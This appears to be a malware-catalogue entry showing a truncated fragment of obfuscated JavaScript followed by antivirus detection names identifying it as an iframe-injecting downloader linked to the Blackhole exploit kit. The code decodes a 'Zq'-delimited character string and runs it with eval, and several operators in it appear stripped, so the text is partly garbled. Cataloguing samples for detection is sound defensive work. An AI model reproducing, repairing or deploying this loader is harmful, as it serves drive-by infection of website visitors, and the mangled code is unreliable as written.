... 3000 bytes are skipped ...q5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[vmzh]("Zq");}nwnjk=rfe;gqxi=[];for(dwmu=22-20-2;-dwmu 1426!=0;dwmu =1){ifdvv=dwmu;if((0x19==031))gqxi =sczi.fromCharCode(eval(lzo nwnjk[1*ifdvv]) 0xa-fuu);}pkzkbj=eval;if(Math.ceil(5.5)===6)pkzkbj(gqxi)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|